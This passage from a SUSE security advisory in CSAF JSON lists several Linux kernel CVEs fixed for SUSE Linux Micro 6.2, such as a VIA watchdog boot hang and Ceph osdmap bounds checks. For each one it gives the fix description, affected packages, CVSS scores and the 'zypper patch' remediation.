ctx-\u003einflight without explicitly\ncomparing against true/false. Since inflight is only ever set to\ntrue or false later, an uninitialized value has triggered\n-EBUSY failures. Zero-initializing memory allocated with\nsock_kmalloc() ensures inflight and other fields start in a known\nstate, removing random issues caused by uninitialized data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71113",
"url": "https://www.suse.com/security/cve/CVE-2025-71113"
},
{
"category": "external",
"summary": "SUSE Bug 1256716 for CVE-2025-71113",
"url": "https://bugzilla.suse.com/1256716"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71113"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
